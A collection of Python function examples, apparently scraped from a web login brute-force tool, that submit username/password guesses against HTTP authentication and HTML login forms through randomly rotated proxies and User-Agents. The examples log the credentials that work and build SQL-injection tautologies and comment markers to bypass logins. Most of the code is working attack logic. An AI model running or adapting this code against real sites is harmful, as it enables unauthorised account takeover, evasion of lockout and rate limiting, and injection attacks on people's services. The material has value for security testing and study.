Example #1
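def submit(options, login_field, creds, result):
    """Send one HTTP-authenticated request and record how the server answered.

    :param options: run settings; this function reads ``proxy``, ``url`` and
        ``verbose``
    :param login_field: not used by this function
    :param creds: pair unpacked as ``(password, username)``
    :param result: queue holding ``[url, username, password]`` entries
    :return: True when ``username`` already has an entry in ``result``,
        False when an exception was caught, otherwise None
    """
    password, username = creds

    # A username that already has a recorded entry is not tried again.
    if username in [x[1] for x in list(result.queue)]:
        return True

    # Bound before the try block: if Browser() itself raises, the finally
    # clause used to fail with UnboundLocalError on proc.close().
    proc = None
    try:
        proc = Browser()
        if options.proxy:
            proxyAddr = list_choose_randomly(options.proxy)
            proc.set_random_proxy(proxyAddr)
        else:
            proxyAddr = ""

        resp = proc.open_url(options.url, auth=(username, password))

        # Server side, every rejected attempt is a 401 on the same URL; that
        # response run is the signal lockout and rate limiting key on.
        if resp.status_code == 401:
            if options.verbose:
                events.fail("['%s':'%s'] <==> %s" %
                            (username, password, proxyAddr),
                            title=proc.get_title())
        elif resp.status_code >= 400:
            # ">= 400" so that a plain 400 is reported as an error instead of
            # falling through to the "found" branch.
            events.error(
                "[%s] ['%s': '%s']" % (proc.get_url(), username, password),
                "%s" % resp.status_code)
        else:
            # The password is passed to the event log and the result queue in
            # clear text, so the tool's output has to be handled as sensitive.
            events.found(username, password, proc.get_title())
            result.put([options.url, username, password])

    except Exception as error:
        events.error("%s" % (error), "BRUTE")
        return False

    finally:
        if proc is not None:
            proc.close()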
Example #2
def random_user_agent():
    """
    Pick one User-Agent value at random.

    The candidates are the newline-separated entries of the text returned
    by ``data.getAgent()``.

    :return: string = agent value (PC)
    """
    # TODO better useragent with library (or create my own - takes time)
    from cores.actions import list_choose_randomly
    agents = data.getAgent().split("\n")
    return list_choose_randomly(agents)
Example #3
    def sCon():
        """Return one randomly shaped boolean condition as SQL text.

        Three shapes are possible, picked at random: a constant
        ("not false" / "true"), a comparison (like, rlike, not like, or a
        numeric ">"), or a random value compared for equality with itself.

        Text of this kind only changes a query when request input is
        concatenated into the SQL string; bound parameters keep it as data.
        """
        kind = list_choose_randomly(["equal", "static", "compare"])
        # Could be faster than create a dict and call element from dict
        if kind == "static":
            return list_choose_randomly(["not false", "true"])

        if kind == "compare":
            operator = list_choose_randomly(["like", "rlike", "not like", "gl"])

            if operator == "gl":
                first = string_gen_randomly(select_type="dig")
                second = string_gen_randomly(select_type="dig")
                # The first value goes on the left only when strictly larger.
                if int(first) > int(second):
                    return "%s > %s" % (first, second)
                return "%s > %s" % (second, first)

            if operator == "not like":
                # MAKE SURE WE ARE HAVING NOT LIKE
                while True:
                    left = string_gen_randomly(select_type="char")
                    right = string_gen_randomly(select_type="char")
                    if left != right:
                        return "'%s' %s '%s'" % (left, operator, right)

            # "like" / "rlike": the same literal on both sides.
            literal = string_gen_randomly(len_min=3,
                                          len_max=5,
                                          select_type="char")
            return "'%s' %s '%s'" % (literal, operator, literal)

        if kind == "equal":
            value_type = list_choose_randomly(["char", "dig"])
            value = string_gen_randomly(len_min=3,
                                        len_max=5,
                                        select_type=value_type)
            # Character values are quoted, digit values are not.
            if value_type == "char":
                return "'%s'='%s'" % (value, value)
            if value_type == "dig":
                return "%s=%s" % (value, value)
Example #4
 def sEnd():
     """Return one of the markers "-- --", "#" or "--", chosen at random."""
     markers = ["-- --", "#", "--"]
     return list_choose_randomly(markers)
Example #5
 def cCon():
     """Return one of the two spellings "or" / "||", chosen at random."""
     connectors = ["or", "||"]
     return list_choose_randomly(connectors)
Example #6
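def submit(options, login_field, tryCred, result):
    """Submit one credential pair through the login form and classify the reply.

    The outcome is tracked in ``isLoginSuccess`` ("False", "blocked", "SQLi",
    "error", "True" or "exception") and reported from the ``finally`` clause.

    :param options: run settings; this function reads ``proxy``, ``url``,
        ``verbose``, ``txt``, ``block_text`` and ``exceptions()``, and writes
        ``block_text`` when no login form is found
    :param login_field: form seen earlier, compared with the form found now
    :param tryCred: pair unpacked as ``(password, username)``
    :param result: queue holding ``[url, username, password]`` entries
    :return: True when ``username`` already has an entry in ``result`` or the
        attempt ran to the end, False when no login form was found, None
        when an exception was caught
    """
    password, username = tryCred

    # A username that already has a recorded entry is not tried again.
    if username in [x[1] for x in list(result.queue)]:
        return True

    from cores.browser import Browser
    isLoginSuccess = "False"
    # Bound before the try block: if Browser() itself raises, the finally
    # clause used to fail with UnboundLocalError on proc.close().
    proc = None
    try:
        proc = Browser()
        if options.proxy:
            # Set proxy connect
            proxy_address = list_choose_randomly(options.proxy)
            proc.set_random_proxy(proxy_address)
        else:
            proxy_address = ""

        proc.open_url(options.url)
        _form = find_login_form(proc.forms())

        if not _form:
            # No login form in the page: keep the response as the reference
            # "blocked" text for later comparisons.
            options.block_text = proc.get_response(
            )  # TODO check if block text changes
            if options.verbose:
                isLoginSuccess = "blocked"
                events.error("Get blocked", "BRUTE")
            return False
        else:
            form_control, form_fields = _form

        if options.verbose and login_field != _form:
            events.info("Login form has been changed", "BRUTE")

        resp = proc.form_submit(form_control, form_fields, tryCred)

        from cores.analysis import get_response_diff
        text_changed, source_changed = get_response_diff(
            options.txt.decode('utf-8'), resp.content.decode('utf-8'))
        # If there is no other login form, check all changes in response
        # If there is no login request from all new urls -> successfully
        # == > Behavior: Login fail, click here or windows.location = login_page

        # "Login form is still there. Oops"
        isLoginForm = bool(find_login_form(proc.forms()))

        if not isLoginForm:
            for new_url in get_redirection(source_changed):
                if not new_url.startswith("http") and not new_url.endswith(
                        options.exceptions()):
                    try:
                        from urllib.parse import urljoin
                    except ImportError:
                        from urlparse import urljoin
                    new_url = urljoin(options.url, new_url)

                # Only targets on the same domain as the login URL are opened.
                if new_url and get_domain(options.url) == get_domain(new_url):
                    proc.open_url(new_url)
                    if find_login_form(proc.forms()):
                        isLoginForm = True
                        break
                    else:
                        isLoginForm = False

        if not isLoginForm:
            # Check SQL Injection
            # 1. SQL Injection
            # 2. Login successfully: No SQLi + No Login form
            if check_sqlerror(proc.get_response()):
                isLoginSuccess = "SQLi"
            elif text_changed == source_changed and text_changed != options.block_text and options.block_text:
                # Outcome stays "False" in this case.
                pass
            else:
                if resp.status_code >= 400:
                    isLoginSuccess = "error"
                else:
                    isLoginSuccess = "True"
                # "If we tried login form with username+password field"

        return True

    except Exception as error:
        # Sometimes, web servers return error code because of bad
        # configurations, but our cred is true.
        # This code block showing information, for special cases
        isLoginSuccess = "exception"
        events.error("%s" % (error), "BRUTE")

    finally:
        # Reporting runs for every exit path above, including the returns.
        # Passwords reach the event log and the result queue in clear text,
        # so the tool's output has to be handled as sensitive.
        if isLoginSuccess == "SQLi":
            events.success("SQL Injection bypass", "BRUTE")
            events.info("['%s': '%s']" % (username, password))
        elif isLoginSuccess == "error" and options.verbose:
            if username:
                events.error(
                    "['%s':'%s'] <--> %s" %
                    (username, password, proxy_address),
                    "%s" % (resp.status_code))
            else:
                events.error("[%s] <--> %s" % (password, proxy_address),
                             "%s" % (resp.status_code))
        elif isLoginSuccess == "True":
            if username:
                events.found(username, password, proc.get_title())
                result.put([options.url, username, password])
            else:
                events.found('', password, proc.get_title())
                result.put([options.url, username, password])
        elif isLoginSuccess == "False" and options.verbose:
            if username:
                events.fail(
                    "['%s':'%s'] <==> %s" %
                    (username, password, proxy_address), text_changed,
                    proc.get_title())
            else:
                events.fail("['%s'] <==> %s" % (password, proxy_address),
                            text_changed, proc.get_title())
        if proc is not None:
            proc.close()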